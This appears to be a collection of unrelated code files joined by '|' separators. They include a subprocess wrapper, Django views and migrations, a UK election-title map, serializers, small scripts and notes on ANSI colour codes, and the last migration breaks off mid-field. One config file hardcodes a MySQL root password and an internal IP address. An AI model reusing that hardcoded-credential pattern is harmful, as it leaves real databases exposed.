#http://www.cnblogs.com/alex3714/articles/5230609.html
#
==========================字体颜色控制===========================
格式:\033[显示方式;前景色;背景色m
说明:
前景色 背景色 颜色
---------------------------------------
30 40 黑色
31 41 红色
32 42 绿色
33 43 黃色
34 44 蓝色
35 45 紫红色
36 46 青蓝色
37 47 白色
显示方式 意义
-------------------------
0 终端默认设置
1 高亮显示
4 使用下划线
5 闪烁
7 反白显示
8 不可见
例子:
\033[1;31;40m <!--1-高亮显示 31-前景色红色 40-背景色黑色-->
\033[0m <!--采用终端默认设置,即取消颜色设置-->
|
#!/usr/bin/python -tt
#
# Copyright (c) 2011 Intel, Inc.
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the Free
# Software Foundation; version 2 of the License
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc., 59
# Temple Place - Suite 330, Boston, MA 02111-1307, USA.
import os
from subprocess import *
from mic import msger
def runtool(cmdln_or_args, catch=1):
""" wrapper for most of the subprocess calls
input:
cmdln_or_args: can be both args and cmdln str (shell=True)
catch: 0, quitely run
1, only STDOUT
2, only STDERR
3, both STDOUT and STDERR
return:
(rc, output)
if catch==0: the output will always None
"""
if catch not in (0, 1, 2, 3):
# invalid catch selection, will cause exception, that's good
return None
if isinstance(cmdln_or_args, list):
cmd = cmdln_or_args[0]
shell = False
else:
import shlex
cmd = shlex.split(cmdln_or_args)[0]
shell = True
if catch != 3:
dev_null = os.open("/dev/null", os.O_WRONLY)
if catch == 0:
sout = dev_null
serr = dev_null
elif catch == 1:
sout = PIPE
serr = dev_null
elif catch == 2:
sout = dev_null
serr = PIPE
elif catch == 3:
sout = PIPE
serr = STDOUT
try:
p = Popen(cmdln_or_args, stdout=sout, stderr=serr, shell=shell)
(sout, serr) = p.communicate()
# combine stdout and stderr, filter None out
out = ''.join(filter(None, [sout, serr]))
except OSError, e:
if e.errno == 2:
# [Errno 2] No such file or directory
msger.error('Cannot run command: %s, lost dependency?' % cmd)
else:
raise # relay
finally:
if catch != 3:
os.close(dev_null)
return (p.returncode, out)
def show(cmdln_or_args):
# show all the message using msger.verbose
rc, out = runtool(cmdln_or_args, catch=3)
if isinstance(cmdln_or_args, list):
cmd = ' '.join(cmdln_or_args)
else:
cmd = cmdln_or_args
msg = 'running command: "%s"' % cmd
if out: out = out.strip()
if out:
msg += ', with output::'
msg += '\n +----------------'
for line in out.splitlines():
msg += '\n | %s' % line
msg += '\n +----------------'
msger.verbose(msg)
return rc
def outs(cmdln_or_args, catch=1):
# get the outputs of tools
return runtool(cmdln_or_args, catch)[1].strip()
def quiet(cmdln_or_args):
return runtool(cmdln_or_args, catch=0)[0]
|
import matplotlib.pyplot as plt
import test_dev.data as data_collection
max_batch_sizes = []
time_commit = []
num_tran = 0
time_ = 0
for data in data_collection.data:
tran = data.get("num_transactions")
time = data.get("commit_time")
max_batch_size = data.get("max_batch_size")
max_batch_sizes.append(max_batch_size)
time_commit.append(time)
num_tran += tran
time_ += time
plt.plot(max_batch_sizes, time_commit,marker ='o', markersize = 12,)
# naming the x axis
plt.xlabel('Kích thước lô tối đa')
# naming the y axis
plt.ylabel('thời gian hoàn thành(s)')
# giving a title to my graph
# plt.title('Kích thước lô = ' + str(data_collection.data[0].get("max_batch_size")) +
# '; giá trị trung bình :' + str(round(num_tran / time_, 2)) + " giao dịch/s")
plt.title('Gửi cố định 1000 giao dịch')
# function to show the plot
plt.show()
|
#coding:utf-8
template_variables = dict(
title=u'Docker管理平台',
name =u'Docker管理平台',
username="",
)
DATABASES = dict(
DB='shipman',
USERNAME='root',
PASSWORD='oldboy@123',
HOST='192.168.11.122',
PORT=3306,
)
NODE_LIST = ['node_ip', 'port']
COOKIE_NAME = "user_id" |
from django.core.cache import cache
from django.core.urlresolvers import reverse
from django.db.models import Q, Avg
from django.http import HttpResponse, HttpResponseNotFound, Http404
from django.template import RequestContext, loader
import json
from web.models import Category, Submission, VoteCategory
def category(request, cat):
"""
- Generates the view for a specific category
- Creates the breadcrumbs for the page
"""
try:
category = Category.objects.get(id=cat)
except Category.DoesNotExist:
raise Http404
parents = category.parent.all()
breadcrumbs = [{'url': reverse('home'), 'title': 'Home'}]
if len(parents) == 0:
parent = category
content = Submission.objects.filter( Q(tags=category) | Q(tags__in=category.child.distinct()) ).distinct()
else:
parent = parents[0]
content = Submission.objects.filter( Q(tags=category) ).distinct()
breadcrumbs.append({'url': reverse('category', args=[parent.id]), 'title': parent})
breadcrumbs.append({'url': reverse('category', args=[category.id]), 'title': category})
# un-json-fy the videos
for c in content:
if c.video: c.video = [v for v in json.loads(c.video)]
if request.user.is_authenticated():
for c in content:
ratings = c.votes.filter(user=request.user)
c.user_rating = {}
if ratings.count() > 0:
for r in ratings:
c.user_rating[int(r.v_category.id)] = int(r.rating)
expositions = category.exposition_set.all()
t = loader.get_template('home/index.html')
c = RequestContext(request, {
'breadcrumbs': breadcrumbs,
'content': content,
'expositions': expositions,
'parent_category': parent,
'parent_categories': Category.objects.filter(parent=None),
'selected_category': category,
'vote_categories': VoteCategory.objects.all(),
})
return HttpResponse(t.render(c))
def index(request):
"""
- Generates the home page
- Generates a list of the most popular videos for each category of rating
- Use memcached to save the popular video rankings to save a lot of time
"""
# get the highest ranked submissions
top_ranked_videos = cache.get('top_ranked_videos')
if not top_ranked_videos:
top_ranked_videos = []
for category in VoteCategory.objects.all():
# for now, calculate an average for each video
top_ranked_videos.append({
'vote_category': category,
'submissions': Submission.objects.filter(votes__v_category=category).annotate(average_rating=Avg('votes__rating')).order_by('-average_rating')[:5],
})
cache.set('top_ranked_videos', top_ranked_videos, 60*10)
t = loader.get_template('home/index.html')
c = RequestContext(request, {
'breadcrumbs': [{'url': reverse('home'), 'title': 'Home'}],
'parent_categories': Category.objects.filter(parent=None),
'top_ranked_videos': top_ranked_videos,
'vote_categories': VoteCategory.objects.all(),
})
return HttpResponse(t.render(c))
def post(request, sid):
"""
- Generates the view for the specific post (submission) from `sid`
- Creates the appropriate breadcrumbs for the categories
"""
s = Submission.objects.get(id=sid)
s.video = [v for v in json.loads(s.video)]
breadcrumbs = [{'url': reverse('home'), 'title': 'Home'}]
parent_categories = s.tags.filter(parent=None)
if len(parent_categories) >= 1:
parent = parent_categories[0]
breadcrumbs.append({'url': reverse('category', args=[parent.id]), 'title': parent})
else: parent = None
categories = s.tags.filter( ~Q(parent=None) )
if len(categories) >= 1:
category = categories[0]
else: category = None
if parent == None:
c = category.parent.all()
if len(c) > 0:
c = category.parent.all()[0]
breadcrumbs.append({'url': reverse('category', args=[c.id]), 'title': c})
if category:
breadcrumbs.append({'url': reverse('category', args=[category.id]), 'title': category})
t = loader.get_template('home/index.html')
c = RequestContext(request, {
'breadcrumbs': breadcrumbs,
'content': [s],
'parent_category': parent,
'parent_categories': Category.objects.filter(parent=None),
'selected_category': category,
'vote_categories': VoteCategory.objects.all(),
})
return HttpResponse(t.render(c))
|
from django.db import migrations
election_title_map = {
"mayor.bedford.2019-05-02": "Mayor of Bedford",
"mayor.bedford.2021-01-01": "Mayor of Bedford",
"mayor.bristol.2016-05-05": "Mayor of Bristol",
"mayor.bristol.2020-05-07": "Mayor of Bristol",
"mayor.bristol.2021-01-01": "Mayor of Bristol",
"mayor.cambridgeshire-and-peterborough.2017-05-04": "Mayor of Cambridgeshire and Peterborough Combined Authority",
"mayor.cambridgeshire-and-peterborough.2021-01-01": "Mayor of Cambridgeshire and Peterborough Combined Authority",
"mayor.copeland.2019-05-02": "Mayor of Copeland",
"mayor.copeland.2021-01-01": "Mayor of Copeland",
"mayor.doncaster.2017-05-04": "Mayor of Doncaster Metropolitan Borough Council",
"mayor.doncaster.2021-01-01": "Mayor of Doncaster Metropolitan Borough Council",
"mayor.greater-manchester-ca.2017-05-04": "Mayor of Greater Manchester",
"mayor.greater-manchester-ca.2020-05-07": "Mayor of Greater Manchester",
"mayor.greater-manchester-ca.2021-01-01": "Mayor of Greater Manchester",
"mayor.hackney.2018-05-03": "Mayor of Hackney",
"mayor.hackney.2021-01-01": "Mayor of Hackney",
"mayor.leicester.2019-05-02": "Mayor of Leicester",
"mayor.leicester.2021-01-01": "Mayor of Leicester",
"mayor.lewisham.2018-05-03": "Mayor of Lewisham",
"mayor.lewisham.2021-01-01": "Mayor of Lewisham",
"mayor.liverpool.2016-05-05": "Mayor of Liverpool",
"mayor.liverpool.2020-05-07": "Mayor of Liverpool",
"mayor.liverpool.2021-01-01": "Mayor of Liverpool",
"mayor.liverpool-city-ca.2017-05-04": "Mayor of Liverpool City Region",
"mayor.liverpool-city-ca.2020-05-07": "Mayor of Liverpool City Region",
"mayor.liverpool-city-ca.2021-01-01": "Mayor of Liverpool City Region",
"mayor.london.2016-05-05": "Mayor of London",
"mayor.london.2020-05-07": "Mayor of London",
"mayor.london.2021-01-01": "Mayor of London",
"mayor.mansfield.2019-05-02": "Mayor of Mansfield",
"mayor.mansfield.2021-01-01": "Mayor of Mansfield",
"mayor.middlesbrough.2019-05-02": "Mayor of Middlesbrough",
"mayor.middlesbrough.2021-01-01": "Mayor of Middlesbrough",
"mayor.newham.2018-05-03": "Mayor of Newham",
"mayor.newham.2021-01-01": "Mayor of Newham",
"mayor.north-of-tyne.2019-05-02": "Mayor of the North of Tyne Combined Authority",
"mayor.north-of-tyne.2021-01-01": "Mayor of the North of Tyne Combined Authority",
"mayor.north-tyneside.2017-05-04": "Mayor of North Tyneside Council",
"mayor.north-tyneside.2021-01-01": "Mayor of North Tyneside Council",
"mayor.salford.2016-05-05": "Mayor of Salford",
"mayor.salford.2020-05-07": "Mayor of Salford",
"mayor.salford.2021-01-01": "Mayor of Salford",
"mayor.sheffield-city-ca.2018-05-03": "Mayor of the Barnsley, Doncaster, Rotherham and Sheffield Combined Authority",
"mayor.sheffield-city-ca.2021-01-01": "Mayor of the Barnsley, Doncaster, Rotherham and Sheffield Combined Authority",
"mayor.tees-valley.2017-05-04": "Mayor of Tees Valley Combined Authority",
"mayor.tees-valley.2020-05-07": "Mayor of Tees Valley Combined Authority",
"mayor.tees-valley.2021-01-01": "Mayor of Tees Valley Combined Authority",
"mayor.torbay.2021-01-01": "Mayor of Torbay",
"mayor.tower-hamlets.2018-05-03": "Mayor of Tower Hamlets",
"mayor.tower-hamlets.2021-01-01": "Mayor of Tower Hamlets",
"mayor.watford.2018-05-03": "Mayor of Watford",
"mayor.watford.2021-01-01": "Mayor of Watford",
"mayor.west-midlands.2017-05-04": "Mayor of West Midlands Combined Authority",
"mayor.west-midlands.2020-05-07": "Mayor of West Midlands Combined Authority",
"mayor.west-midlands.2021-01-01": "Mayor of West Midlands Combined Authority",
"mayor.west-of-england.2017-05-04": "Mayor of West of England Combined Authority",
"mayor.west-of-england.2021-01-01": "Mayor of West of England Combined Authority",
"gla.c.barnet-and-camden.2016-05-05": "Greater London Assembly elections (Constituencies) Barnet and Camden",
"gla.c.bexley-and-bromley.2016-05-05": "Greater London Assembly elections (Constituencies) Bexley and Bromley",
"gla.c.brent-and-harrow.2016-05-05": "Greater London Assembly elections (Constituencies) Brent and Harrow",
"gla.c.city-and-east.2016-05-05": "Greater London Assembly elections (Constituencies) City and East",
"gla.c.croydon-and-sutton.2016-05-05": "Greater London Assembly elections (Constituencies) Croydon and Sutton",
"gla.c.ealing-and-hillingdon.2016-05-05": "Greater London Assembly elections (Constituencies) Ealing and Hillingdon",
"gla.c.enfield-and-haringey.2016-05-05": "Greater London Assembly elections (Constituencies) Enfield and Haringey",
"gla.c.greenwich-and-lewisham.2016-05-05": "Greater London Assembly elections (Constituencies) Greenwich and Lewisham",
"gla.c.havering-and-redbridge.2016-05-05": "Greater London Assembly elections (Constituencies) Havering and Redbridge",
"gla.c.lambeth-and-southwark.2016-05-05": "Greater London Assembly elections (Constituencies) Lambeth and Southwark",
"gla.c.merton-and-wandsworth.2016-05-05": "Greater London Assembly elections (Constituencies) Merton and Wandsworth",
"gla.c.north-east.2016-05-05": "Greater London Assembly elections (Constituencies) North East",
"gla.c.south-west.2016-05-05": "Greater London Assembly elections (Constituencies) South West",
"gla.c.west-central.2016-05-05": "Greater London Assembly elections (Constituencies) West Central",
"gla.c.barnet-and-camden.2020-05-07": "Greater London Assembly elections (Constituencies) Barnet and Camden",
"gla.c.bexley-and-bromley.2020-05-07": "Greater London Assembly elections (Constituencies) Bexley and Bromley",
"gla.c.brent-and-harrow.2020-05-07": "Greater London Assembly elections (Constituencies) Brent and Harrow",
"gla.c.city-and-east.2020-05-07": "Greater London Assembly elections (Constituencies) City and East",
"gla.c.croydon-and-sutton.2020-05-07": "Greater London Assembly elections (Constituencies) Croydon and Sutton",
"gla.c.ealing-and-hillingdon.2020-05-07": "Greater London Assembly elections (Constituencies) Ealing and Hillingdon",
"gla.c.enfield-and-haringey.2020-05-07": "Greater London Assembly elections (Constituencies) Enfield and Haringey",
"gla.c.greenwich-and-lewisham.2020-05-07": "Greater London Assembly elections (Constituencies) Greenwich and Lewisham",
"gla.c.havering-and-redbridge.2020-05-07": "Greater London Assembly elections (Constituencies) Havering and Redbridge",
"gla.c.lambeth-and-southwark.2020-05-07": "Greater London Assembly elections (Constituencies) Lambeth and Southwark",
"gla.c.merton-and-wandsworth.2020-05-07": "Greater London Assembly elections (Constituencies) Merton and Wandsworth",
"gla.c.north-east.2020-05-07": "Greater London Assembly elections (Constituencies) North East",
"gla.c.south-west.2020-05-07": "Greater London Assembly elections (Constituencies) South West",
"gla.c.west-central.2020-05-07": "Greater London Assembly elections (Constituencies) West Central",
"naw.c.aberavon.2016-05-05": "National Assembly for Wales elections (Constituencies) Aberavon",
"naw.c.aberconwy.2016-05-05": "National Assembly for Wales elections (Constituencies) Aberconwy",
"naw.c.alyn-and-deeside.2016-05-05": "National Assembly for Wales elections (Constituencies) Alyn and Deeside",
"naw.c.arfon.2016-05-05": "National Assembly for Wales elections (Constituencies) Arfon",
"naw.c.blaenau-gwent.2016-05-05": "National Assembly for Wales elections (Constituencies) Blaenau Gwent",
"naw.c.brecon-and-radnorshire.2016-05-05": "National Assembly for Wales elections (Constituencies) Brecon and Radnorshire",
"naw.c.bridgend.2016-05-05": "National Assembly for Wales elections (Constituencies) Bridgend",
"naw.c.caerphilly.2016-05-05": "National Assembly for Wales elections (Constituencies) Caerphilly",
"naw.c.cardiff-central.2016-05-05": "National Assembly for Wales elections (Constituencies) Cardiff Central",
"naw.c.cardiff-north.2016-05-05": "National Assembly for Wales elections (Constituencies) Cardiff North",
"naw.c.cardiff-south-and-penarth.2016-05-05": "National Assembly for Wales elections (Constituencies) Cardiff South and Penarth",
"naw.c.cardiff-west.2016-05-05": "National Assembly for Wales elections (Constituencies) Cardiff West",
"naw.c.carmarthen-east-and-dinefwr.2016-05-05": "National Assembly for Wales elections (Constituencies) Carmarthen East and Dinefwr",
"naw.c.carmarthen-west-and-south-pembrokeshire.2016-05-05": "National Assembly for Wales elections (Constituencies) Carmarthen West and South Pembrokeshire",
"naw.c.ceredigion.2016-05-05": "National Assembly for Wales elections (Constituencies) Ceredigion",
"naw.c.clwyd-south.2016-05-05": "National Assembly for Wales elections (Constituencies) Clwyd South",
"naw.c.clwyd-west.2016-05-05": "National Assembly for Wales elections (Constituencies) Clwyd West",
"naw.c.cynon-valley.2016-05-05": "National Assembly for Wales elections (Constituencies) Cynon Valley",
"naw.c.delyn.2016-05-05": "National Assembly for Wales elections (Constituencies) Delyn",
"naw.c.dwyfor-meirionnydd.2016-05-05": "National Assembly for Wales elections (Constituencies) Dwyfor Meirionnydd",
"naw.c.gower.2016-05-05": "National Assembly for Wales elections (Constituencies) Gower",
"naw.c.islwyn.2016-05-05": "National Assembly for Wales elections (Constituencies) Islwyn",
"naw.c.llanelli.2016-05-05": "National Assembly for Wales elections (Constituencies) Llanelli",
"naw.c.merthyr-tydfil-and-rhymney.2016-05-05": "National Assembly for Wales elections (Constituencies) Merthyr Tydfil and Rhymney",
"naw.c.monmouth.2016-05-05": "National Assembly for Wales elections (Constituencies) Monmouth",
"naw.c.montgomeryshire.2016-05-05": "National Assembly for Wales elections (Constituencies) Montgomeryshire",
"naw.c.neath.2016-05-05": "National Assembly for Wales elections (Constituencies) Neath",
"naw.c.newport-east.2016-05-05": "National Assembly for Wales elections (Constituencies) Newport East",
"naw.c.newport-west.2016-05-05": "National Assembly for Wales elections (Constituencies) Newport West",
"naw.c.ogmore.2016-05-05": "National Assembly for Wales elections (Constituencies) Ogmore",
"naw.c.pontypridd.2016-05-05": "National Assembly for Wales elections (Constituencies) Pontypridd",
"naw.c.preseli-pembrokeshire.2016-05-05": "National Assembly for Wales elections (Constituencies) Preseli Pembrokeshire",
"naw.c.rhondda.2016-05-05": "National Assembly for Wales elections (Constituencies) Rhondda",
"naw.c.swansea-east.2016-05-05": "National Assembly for Wales elections (Constituencies) Swansea East",
"naw.c.swansea-west.2016-05-05": "National Assembly for Wales elections (Constituencies) Swansea West",
"naw.c.torfaen.2016-05-05": "National Assembly for Wales elections (Constituencies) Torfaen",
"naw.c.vale-of-clwyd.2016-05-05": "National Assembly for Wales elections (Constituencies) Vale of Clwyd",
"naw.c.vale-of-glamorgan.2016-05-05": "National Assembly for Wales elections (Constituencies) Vale of Glamorgan",
"naw.c.wrexham.2016-05-05": "National Assembly for Wales elections (Constituencies) Wrexham",
"naw.c.ynys-mon.2016-05-05": "National Assembly for Wales elections (Constituencies) Ynys Môn",
"naw.c.alyn-and-deeside.by.2018-02-06": "National Assembly for Wales election (Constituencies) Alyn and Deeside by-election",
"naw.r.mid-and-west-wales.2016-05-05": "National Assembly for Wales elections (Regions) Mid and West Wales",
"naw.r.north-wales.2016-05-05": "National Assembly for Wales elections (Regions) North Wales",
"naw.r.south-wales-central.2016-05-05": "National Assembly for Wales elections (Regions) South Wales Central",
"naw.r.south-wales-east.2016-05-05": "National Assembly for Wales elections (Regions) South Wales East",
"naw.r.south-wales-west.2016-05-05": "National Assembly for Wales elections (Regions) South Wales West",
"sp.c.aberdeen-central.2016-05-05": "Scottish Parliament elections (Constituencies) Aberdeen Central",
"sp.c.aberdeen-donside.2016-05-05": "Scottish Parliament elections (Constituencies) Aberdeen Donside",
"sp.c.aberdeenshire-east.2016-05-05": "Scottish Parliament elections (Constituencies) Aberdeenshire East",
"sp.c.aberdeenshire-west.2016-05-05": "Scottish Parliament elections (Constituencies) Aberdeenshire West",
"sp.c.aberdeen-south-and-north-kincardine.2016-05-05": "Scottish Parliament elections (Constituencies) Aberdeen South and North Kincardine",
"sp.c.airdrie-and-shotts.2016-05-05": "Scottish Parliament elections (Constituencies) Airdrie and Shotts",
"sp.c.almond-valley.2016-05-05": "Scottish Parliament elections (Constituencies) Almond Valley",
"sp.c.angus-north-and-mearns.2016-05-05": "Scottish Parliament elections (Constituencies) Angus North and Mearns",
"sp.c.angus-south.2016-05-05": "Scottish Parliament elections (Constituencies) Angus South",
"sp.c.argyll-and-bute.2016-05-05": "Scottish Parliament elections (Constituencies) Argyll and Bute",
"sp.c.ayr.2016-05-05": "Scottish Parliament elections (Constituencies) Ayr",
"sp.c.banffshire-and-buchan-coast.2016-05-05": "Scottish Parliament elections (Constituencies) Banffshire and Buchan Coast",
"sp.c.caithness-sutherland-and-ross.2016-05-05": "Scottish Parliament elections (Constituencies) Caithness, Sutherland and Ross",
"sp.c.carrick-cumnock-and-doon-valley.2016-05-05": "Scottish Parliament elections (Constituencies) Carrick, Cumnock and Doon Valley",
"sp.c.clackmannanshire-and-dunblane.2016-05-05": "Scottish Parliament elections (Constituencies) Clackmannanshire and Dunblane",
"sp.c.clydebank-and-milngavie.2016-05-05": "Scottish Parliament elections (Constituencies) Clydebank and Milngavie",
"sp.c.clydesdale.2016-05-05": "Scottish Parliament elections (Constituencies) Clydesdale",
"sp.c.coatbridge-and-chryston.2016-05-05": "Scottish Parliament elections (Constituencies) Coatbridge and Chryston",
"sp.c.cowdenbeath.2016-05-05": "Scottish Parliament elections (Constituencies) Cowdenbeath",
"sp.c.cumbernauld-and-kilsyth.2016-05-05": "Scottish Parliament elections (Constituencies) Cumbernauld and Kilsyth",
"sp.c.cunninghame-north.2016-05-05": "Scottish Parliament elections (Constituencies) Cunninghame North",
"sp.c.cunninghame-south.2016-05-05": "Scottish Parliament elections (Constituencies) Cunninghame South",
"sp.c.dumbarton.2016-05-05": "Scottish Parliament elections (Constituencies) Dumbarton",
"sp.c.dumfriesshire.2016-05-05": "Scottish Parliament elections (Constituencies) Dumfriesshire",
"sp.c.dundee-city-east.2016-05-05": "Scottish Parliament elections (Constituencies) Dundee City East",
"sp.c.dundee-city-west.2016-05-05": "Scottish Parliament elections (Constituencies) Dundee City West",
"sp.c.dunfermline.2016-05-05": "Scottish Parliament elections (Constituencies) Dunfermline",
"sp.c.east-kilbride.2016-05-05": "Scottish Parliament elections (Constituencies) East Kilbride",
"sp.c.east-lothian.2016-05-05": "Scottish Parliament elections (Constituencies) East Lothian",
"sp.c.eastwood.2016-05-05": "Scottish Parliament elections (Constituencies) Eastwood",
"sp.c.edinburgh-central.2016-05-05": "Scottish Parliament elections (Constituencies) Edinburgh Central",
"sp.c.edinburgh-eastern.2016-05-05": "Scottish Parliament elections (Constituencies) Edinburgh Eastern",
"sp.c.edinburgh-northern-and-leith.2016-05-05": "Scottish Parliament elections (Constituencies) Edinburgh Northern and Leith",
"sp.c.edinburgh-pentlands.2016-05-05": "Scottish Parliament elections (Constituencies) Edinburgh Pentlands",
"sp.c.edinburgh-southern.2016-05-05": "Scottish Parliament elections (Constituencies) Edinburgh Southern",
"sp.c.edinburgh-western.2016-05-05": "Scottish Parliament elections (Constituencies) Edinburgh Western",
"sp.c.ettrick-roxburgh-and-berwickshire.2016-05-05": "Scottish Parliament elections (Constituencies) Ettrick, Roxburgh and Berwickshire",
"sp.c.falkirk-east.2016-05-05": "Scottish Parliament elections (Constituencies) Falkirk East",
"sp.c.falkirk-west.2016-05-05": "Scottish Parliament elections (Constituencies) Falkirk West",
"sp.c.galloway-and-west-dumfries.2016-05-05": "Scottish Parliament elections (Constituencies) Galloway and West Dumfries",
"sp.c.glasgow-anniesland.2016-05-05": "Scottish Parliament elections (Constituencies) Glasgow Anniesland",
"sp.c.glasgow-cathcart.2016-05-05": "Scottish Parliament elections (Constituencies) Glasgow Cathcart",
"sp.c.glasgow-kelvin.2016-05-05": "Scottish Parliament elections (Constituencies) Glasgow Kelvin",
"sp.c.glasgow-maryhill-and-springburn.2016-05-05": "Scottish Parliament elections (Constituencies) Glasgow Maryhill and Springburn",
"sp.c.glasgow-pollok.2016-05-05": "Scottish Parliament elections (Constituencies) Glasgow Pollok",
"sp.c.glasgow-provan.2016-05-05": "Scottish Parliament elections (Constituencies) Glasgow Provan",
"sp.c.glasgow-shettleston.2016-05-05": "Scottish Parliament elections (Constituencies) Glasgow Shettleston",
"sp.c.glasgow-southside.2016-05-05": "Scottish Parliament elections (Constituencies) Glasgow Southside",
"sp.c.greenock-and-inverclyde.2016-05-05": "Scottish Parliament elections (Constituencies) Greenock and Inverclyde",
"sp.c.hamilton-larkhall-and-stonehouse.2016-05-05": "Scottish Parliament elections (Constituencies) Hamilton, Larkhall and Stonehouse",
"sp.c.inverness-and-nairn.2016-05-05": "Scottish Parliament elections (Constituencies) Inverness and Nairn",
"sp.c.kilmarnock-and-irvine-valley.2016-05-05": "Scottish Parliament elections (Constituencies) Kilmarnock and Irvine Valley",
"sp.c.kirkcaldy.2016-05-05": "Scottish Parliament elections (Constituencies) Kirkcaldy",
"sp.c.linlithgow.2016-05-05": "Scottish Parliament elections (Constituencies) Linlithgow",
"sp.c.mid-fife-and-glenrothes.2016-05-05": "Scottish Parliament elections (Constituencies) Mid Fife and Glenrothes",
"sp.c.midlothian-north-and-musselburgh.2016-05-05": "Scottish Parliament elections (Constituencies) Midlothian North and Musselburgh",
"sp.c.midlothian-south-tweeddale-and-lauderdale.2016-05-05": "Scottish Parliament elections (Constituencies) Midlothian South, Tweeddale and Lauderdale",
"sp.c.moray.2016-05-05": "Scottish Parliament elections (Constituencies) Moray",
"sp.c.motherwell-and-wishaw.2016-05-05": "Scottish Parliament elections (Constituencies) Motherwell and Wishaw",
"sp.c.na-h-eileanan-an-iar.2016-05-05": "Scottish Parliament elections (Constituencies) Na h-Eileanan an Iar",
"sp.c.north-east-fife.2016-05-05": "Scottish Parliament elections (Constituencies) North East Fife",
"sp.c.orkney-islands.2016-05-05": "Scottish Parliament elections (Constituencies) Orkney Islands",
"sp.c.paisley.2016-05-05": "Scottish Parliament elections (Constituencies) Paisley",
"sp.c.perthshire-north.2016-05-05": "Scottish Parliament elections (Constituencies) Perthshire North",
"sp.c.perthshire-south-and-kinross-shire.2016-05-05": "Scottish Parliament elections (Constituencies) Perthshire South and Kinross-shire",
"sp.c.renfrewshire-north-and-west.2016-05-05": "Scottish Parliament elections (Constituencies) Renfrewshire North and West",
"sp.c.renfrewshire-south.2016-05-05": "Scottish Parliament elections (Constituencies) Renfrewshire South",
"sp.c.rutherglen.2016-05-05": "Scottish Parliament elections (Constituencies) Rutherglen",
"sp.c.shetland-islands.2016-05-05": "Scottish Parliament elections (Constituencies) Shetland Islands",
"sp.c.skye-lochaber-and-badenoch.2016-05-05": "Scottish Parliament elections (Constituencies) Skye, Lochaber and Badenoch",
"sp.c.stirling.2016-05-05": "Scottish Parliament elections (Constituencies) Stirling",
"sp.c.strathkelvin-and-bearsden.2016-05-05": "Scottish Parliament elections (Constituencies) Strathkelvin and Bearsden",
"sp.c.uddingston-and-bellshill.2016-05-05": "Scottish Parliament elections (Constituencies) Uddingston and Bellshill",
"sp.c.shetland-islands.by.2019-08-29": "Scottish Parliament elections (Constituencies) Shetland Islands by-election",
"sp.r.central-scotland.2016-05-05": "Scottish Parliament elections (Regions) Central Scotland",
"sp.r.glasgow.2016-05-05": "Scottish Parliament elections (Regions) Glasgow",
"sp.r.highlands-and-islands.2016-05-05": "Scottish Parliament elections (Regions) Highlands and Islands",
"sp.r.lothian.2016-05-05": "Scottish Parliament elections (Regions) Lothian",
"sp.r.mid-scotland-and-fife.2016-05-05": "Scottish Parliament elections (Regions) Mid Scotland and Fife",
"sp.r.north-east-scotland.2016-05-05": "Scottish Parliament elections (Regions) North East Scotland",
"sp.r.south-scotland.2016-05-05": "Scottish Parliament elections (Regions) South Scotland",
"sp.r.west-scotland.2016-05-05": "Scottish Parliament elections (Regions) West Scotland",
}
def fix_old_election_titles(apps, schema_editor):
for election_id, title in election_title_map.items():
Election = apps.get_model("elections", "Election")
try:
e = Election.private_objects.get(election_id=election_id)
e.election_title = title
e.save()
except Election.DoesNotExist:
# don't throw an exception
# if we're initializing an enpty DB
pass
class Migration(migrations.Migration):
dependencies = [
("elections", "0056_cleanup_group_types"),
]
operations = [
migrations.RunPython(fix_old_election_titles, migrations.RunPython.noop)
]
|
from pydantic import BaseModel
class UserCreateResponse(BaseModel):
code: str = None
# data: dict = {"Oauth-Token": str, "expire": 86400*7}
data: dict
msg: str = None
class Config:
orm_mode = True
class UserCurrentResponse(BaseModel):
code: str = None
# data: dict = {"nickname": str, "avatar": '', "id": int, "username": str}
data: dict
msg: str = None
|
from setuptools import setup
def readme():
with open('README.md') as f:
return f.read()
setup(
name = 'ryser',
version = '0.0.12',
packages = ['ryser',],
description = "Latin squares and related designs.",
author = "Matthew Henderson",
author_email = "matthew.james.henderson@gmail.com",
url = "http://packages.python.org/ryser/",
download_url = "http://pypi.python.org/pypi/ryser/",
keywords = [""],
classifiers = [
"Programming Language :: Python",
"Environment :: Other Environment",
"Intended Audience :: Developers",
"License :: OSI Approved :: GNU Library or Lesser General Public License (LGPL)",
"Operating System :: OS Independent",
"Topic :: Software Development :: Libraries :: Python Modules",
],
license = 'LICENSE.txt',
long_description = readme(),
test_suite='nose.collector',
tests_require=['nose'],
)
|
import sys
import time
import threading
import logging
from library.vpm import BinaryOut
logger = logging.getLogger(__name__)
class vdm(threading.Thread):
def __init__(self, config,callback):
threading.Thread.__init__(self)
self._config = config
self._callback = callback
self._hwHandle = {}
def setup(self):
for key, item in self._config.items():
if 'BINARY-OUT' in item.get('MODE'):
self._hwHandle[key] = BinaryOut(item)
self._hwHandle.get(key).setup()
if 'BINARY-IN'in item.get('MODE'):
self._hwHandle[key] = BinaryOut(item)
self._hwHandle.get(key).setup()
|
el_before = 2
el = 1
ans = 1
for i in range(2,int(input())+1):
ans = el + el_before
el_before = el
el = ans
print(ans) |
from rest_framework import serializers
from . import models
class ChoiceSerializer(serializers.ModelSerializer):
class Meta:
model = models.Choice
fields = ('id', 'description', )
class PollSerializer(serializers.ModelSerializer):
choices = ChoiceSerializer(many=True, read_only=True)
class Meta:
model = models.Poll
fields = ('id', 'title', 'date', 'vote_count', 'choices',)
class VoteSerializer(serializers.ModelSerializer):
class Meta:
model = models.Vote
fields = ('choice', 'poll', 'date',)
class VoteResultSerializer(serializers.Serializer):
id = serializers.IntegerField()
description = serializers.CharField(max_length=255)
total = serializers.IntegerField()
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2019-05-21 07:08
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('edu', '0009_auto_20190519_2222'),
]
operations = [
migrations.AlterField(
model_name='register',
name='classroom',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='registers', to='edu.Classroom', verbose_name='کلاس'),
),
migrations.AlterField(
model_name='register',
name='is_active',
field=models.BooleanField(verbose_name='فعال'),
),
migrations.AlterField(
model_name='register',
name='student',
